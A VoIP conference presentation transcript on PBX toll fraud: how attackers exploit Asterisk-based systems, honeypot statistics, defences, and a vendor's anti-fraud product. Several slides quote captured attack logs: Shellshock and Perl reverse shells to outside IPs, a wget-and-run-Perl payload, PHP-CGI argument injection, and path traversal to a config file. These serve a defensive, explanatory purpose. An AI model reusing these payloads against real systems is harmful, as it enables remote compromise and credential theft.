OSCP Preparation Guide @ Infosectrain
 

More from Flavio Eduardo de Andrade Goncalves

More from Flavio Eduardo de Andrade Goncalves (6)

Asterisk sip channel performance
Asterisk sip channel performanceAsterisk sip channel performance
Asterisk sip channel performance
 
Asterisk Complete Training
Asterisk Complete TrainingAsterisk Complete Training
Asterisk Complete Training
 
Asteriskem sistemasembarcados
Asteriskem sistemasembarcadosAsteriskem sistemasembarcados
Asteriskem sistemasembarcados
 
Call Center baseado em Asterisk
Call Center baseado em AsteriskCall Center baseado em Asterisk
Call Center baseado em Asterisk
 
Oreka, O Gravador VoIP Open Source
Oreka, O Gravador VoIP Open SourceOreka, O Gravador VoIP Open Source
Oreka, O Gravador VoIP Open Source
 
Asterisk casosdesucesso
Asterisk casosdesucessoAsterisk casosdesucesso
Asterisk casosdesucesso
 

Recently uploaded

Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power
 
Chizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck. .pptxChizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck. .pptxogubuikealex
 
Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸mathanramanathan2005
 
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGYPHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGYpruthirajnayak525
 
Early Modern Spain. All about this period
Early Modern Spain. All about this periodEarly Modern Spain. All about this period
Early Modern Spain. All about this periodSaraIsabelJimenez
 
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comSaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comsaastr
 
The Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationThe Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationNathan Young
 
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...Henrik Hanke
 
Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Escort Service
 
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRachelAnnTenibroAmaz
 
SBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSebastiano Panichella
 
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRRINDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRRsarwankumar4524
 
The 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringThe 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringSebastiano Panichella
 
Quality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for RA (1ST SEMQuality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for RA (1ST SEMCharmi13
 
THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...
THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...
THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...漢銘 謝
 
Genshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxGenshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxJohnree4
 
miladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxmiladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxCarrieButtitta
 
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSimulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSebastiano Panichella
 
Event 4 Introduction to Open Source.pptx
Event 4 Introduction to Open Source.pptxEvent 4 Introduction to Open Source.pptx
Event 4 Introduction to Open Source.pptxaryanv1753
 
Work Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxWork Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxmavinoikein
 

Recently uploaded (20)

Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
 
Chizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck. .pptxChizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck. .pptx
 
Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸
 
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGYPHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
 
Early Modern Spain. All about this period
Early Modern Spain. All about this periodEarly Modern Spain. All about this period
Early Modern Spain. All about this period
 
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comSaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
 
The Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationThe Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism Presentation
 
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
 
Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170
 
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
 
SBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation Track
 
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRRINDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
 
The 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringThe 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software Engineering
 
Quality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for RA (1ST SEMQuality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for RA (1ST SEM
 
THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...
THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...
THE COUNTRY WHO SOLVED THE WORLD_HOW CHINA LAUNCHED THE CIVILIZATION REVOLUTI...
 
Genshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxGenshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptx
 
miladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxmiladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptx
 
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSimulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
 
Event 4 Introduction to Open Source.pptx
Event 4 Introduction to Open Source.pptxEvent 4 Introduction to Open Source.pptx
Event 4 Introduction to Open Source.pptx
 
Work Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxWork Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptx
 

No More Fraud, Astricon, Las Vegas 2014

  • 1. No More Fraud! Let’s say “enough is enough”
  • 2. About me Flavio E. Goncalves CTO of SipPulse (www.sippulse.com) Turnkey solutions for VoIP providers and Telcos. Anti-Fraud Solutions
  • 3. Why you should care? Exposure for a single T1 line 43200 min/month, US$5/min, 23 lines US$ 4.968.000
  • 4. Why they are doing? #1 Allocate a number and a recording in a PRN provider #2 Find a vulnerable device Using shodan #3 Make calls and cash your money
  • 6. Distribution by country 117636 105603 78656 32795 11910 11120 10702 3736 2836 1978 US FR DE PS RU TW SC SG GB CA
  • 7. TOP Prefixes +972 Palestine +44 Great Britain +86 China +20 Egypt
  • 8. TOP 5 PBX Exploits in September/October 1. Shellshock 2. PHP/LAMP Injection 3. SQL injection in Trixbox 4. Linksys remote code execution 5. FreePBX Remote Code Execution
  • 9. #1 Shellshock • Exploit Date: 09/2014 Specimen: • [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'" • [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/ defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
  • 10. #2 SQL injection in Trixbox • Exploit Date: 03/2014 - http://www.exploit-db. com/exploits/32239/ Specimen: • [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/ conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
  • 11. #3 Linksys Remote Code Execution • Exploit Date: 02/2014 - http://www.exploit-db. com/exploits/31683/ Specimen: • [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
  • 12. #4 LAMP Attacks • Apache/PHP Remote Exploit • Exploit date 10/2013 • Especimen: • POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n • [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/ php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61 %66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%6 9%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D %64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%7 0%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%7 2%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F% 73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“
  • 13. #5 CallMeNum (Demo) • Exploit date: 03/2012 • Specimen: • GET /recordings/misc/callme_page.php?action=c&callmenum=888 @ext-featurecodes/n • Application: system • Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,“x.y.z.w:4446"); STDIN- >fdopen($c,r); $~->fdopen($c,w); $c- >write("]QAfH#.Eqncmpn"); system$_ while<>;'
  • 14. Unknown Exploits • Jul/2014 • Specimen: [03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php [03/Jul/2014] "GET /fuxkkk.php [03/Jul/2014] "GET /recordings/theme/alexpass.php
  • 15. Still uncommon • MANAGER PORT - 5038 • H323 - 1720 • MGCP – 5036 • TFTP – 69 • IAX2 - 4569
  • 16. How hackers are getting into your PBX • #1 – Sip Brute Force (Fail2ban is effective) • #2 – Http Exploitation • #3 – Attacks to phones • #4 – Caller ID Spoofing • #5 – Billing/Credit card frauds
  • 17. Part – III How to defend #1 Patching Everything and Upgrade frequently #2 Use a Firewall #3 Use a Session Border Controller #4 Use Encryption #5 Use an Anti-Fraud System
  • 18. #1 Patch Everything, update frequently • Effectiveness: Low • Risk: High • Cost: High
  • 19. #2 Use a Firewall or configure properly IP tables • Effectiveness: High • Risk: Medium • Cost: Low • Absolutely a must do. At least, no Internet access to SSH, no Internet access to HTTP/HTTPS. • No prevention for phones attacks
  • 20. #3 Use a Session Border Controller • Effectiveness: Medium • Risk: Medium • Cost: Very High
  • 21. #4 Use encryption • Effectiveness: Medium •Risk: Medium •Cost: High if you intend to do mutual authentication
  • 22. #5 Use an AntiFraud System • Effectiveness: High • Risk: Very Low • Cost: Medium • Comments: Can detect 99.999% of the attacks, It prevents against caller ID spoofing, Social Engineering and Phone Attacks. • Limitations: Firewall restrictions are required to avoid tampering the anti-fraud rules.
  • 23. Working Together in 2 steps 1. Make sure your customer’s firewall and fail2ban is configured right (You) 2. Partner with us to use TFPS on your customers (Us)
  • 24. Fraud Prevention for All www.tfps.co
  • 25. How effective it is an Anti-Fraud Solution •99.989% just by protocol signature. • Number obtained comparing the attacks registered on the honeypot against rules. Anti-Fraud Effectiveness Detected Undetected
  • 26. www.tfps.co || tfps.sippulse.com 1. 99.89% of the attacks prevented by signature detection 2. Collaborative protection. One PBX hacked automatically blocks the IP for the others 3. Mechanism, SIP Redirect •No additional hardware required. •Available for OpenSIPS/Freeswitch/Asterisk
  • 27. Asterisk Code [from-internal] ; Set there the context for your users ;FPS for International Calls exten=_011[1-9].,1,set(ip=${CHANNEL(recvip)}) same=>n,SIPAddHeader(P-Received: ${ip}) same=>n,set(ua=${CHANNEL(useragent)}) same=>n,SIPAddHeader(P-UA: ${ua}) same=>n,set(GROUP()=fps) same=>n,set(ncalls=${GROUP_COUNT(fps)}) same=>n,SIPAddHeader(P-Calls: ${ncalls}) same=>n,set(_original=${EXTEN}) same=>n,dial(SIP/fps/${EXTEN:2})
  • 28. Asterisk Code [fps] ;For calls not approved exten=_R.,1,Answer() same=>n,playback(unauthorized); (Customize here to generate an error message) same=>n,hangup(21) ;For calls approved exten=_A.,1,Answer() same=>n,Dial(SIP/provider/${original});(Customize here to send the call ahead) same=>n,hangup(16)
  • 30. Comparing to other anti-fraud solutions! • Pluggable • No Additional Hardware • Small traffic to be analyzed • Small risk, only a few calls can be affected. • Easy handling of outages
  • 32. Thank You! • e-mail: flavio@sippulse.com • skype: flaviogoncalves1 • Twitter: @asteriskguide • blog.tfps.co
  • 34. #6 FreePBX 2.x Code Execution • Specimen: • [03/Jul/2014:17:28:41 +0000] "GET • /admin/config.php?display=auth&handler=api&func tion=system&args=cd%20/tmp;rm%20- f%20e;wget%20http://93.170.130.201:3003/e;perl% 20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
  • 35. #4 VTIGER Exploit (Lots of variations) • 0001189: Vtiger CRM - php inject vulnerability • Specimen • 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?mo dule_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-“ • 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action= savewordtemplate HTTP/1.1" 404 537 "-" "-"
  • 36. #4 PHP Code Injection Vulnerability • Specimen: • [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20- e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3 Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22 93.170.130.201%3A3333%22)%3B%20STDIN- %3Efdopen(%24c%2Cr)%3B%20%24~- %3Efdopen(%24c%2Cw)%3B%20%24c- %3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20s ystem%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-“ • "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c- >write("]QAfH#.Eqnunkn"); system$_ while<>;'
  • 37. #9 FreePBX Extension Dump Exploitation • Specimen: • 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log. php?handler=cdr&s=&t=&order=calldate &sens=DESC&current_page=0/admin/cdr/ca ll-comp.php HTTP/1.1" 404 484 "-" "-"
  • 38. #6 Freeswitch Attacks GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df- df&template=linksys
  • 39. #4 Caller ID Spoofing • 1 - Send 1 million calls and cancel • 2 - Fake the callerID to a PRN • 3 - Wait for the call back.
  • 40. Open Source is a Target! •We are seeing scans for: • Vicidial • Astpp • phpMyAdmin (hot) • Tomcat • Jboss • FreeSwitch
  • 41. First way to protect 1.Make sure your system is protected by a firewall 1. Vulnerability SCAN 2. Apply firewall rules to prevent unauthorized access to the server 3. Use .htaccess and implement dual authentication
  • 42. # 5 SIP Phone Recent Vulnerabilities • Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10) • Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014- 3313/ (4.3) • Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014- 3312/ (6.9) • Yealink - http://www.cvedetails.com/cve/CVE-2014-3427 • Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/

Editor's Notes

  1. Hello everybody. In the first place I would like to say thanks for the Astricon staff for this wonderful event at Las Vegas and the opportunity to be talking with you. It is a pleasure and honor for me to be here today. Our presentation today will cover the Fraud issue. It is not new, but unfortunately it is still here and growing. Is it time to say enough is enough. There is no technical justification to be frauded in these days. There are lots of tools available and we can work together to make sure your server is protected against these criminals.
  2. Let me briefly introduce myselfm I’m CEO of SipPulse a softswich developer located in Brazil. We provide turnkey solutions for ITSPs and also Anti-Fraud solutions for PBXs.
  3. #1 You don’t want to bankrupt your customers. An IP-PBX is one of the few technologies that can bankrupt your customer in less than 30 days. To work with IP-PBX and TDM trunks is actually very dangerous, because there are no limits in phone bills. #2 You don’t want to defend yourself in court. In many cases, mainly when you are doing Software as a Service you can be liable for the security of the solution. #3 You don’t want to stigmatize the Asterisk PBX market and slow sales. If some customers realize the potential dangerous of implementing an IP-PBX, many would give up without even start. Fraud is bad for business. #4 You don’t want the investments in IP telephony going to phone bills. Fraud can consume the customer’s year budget.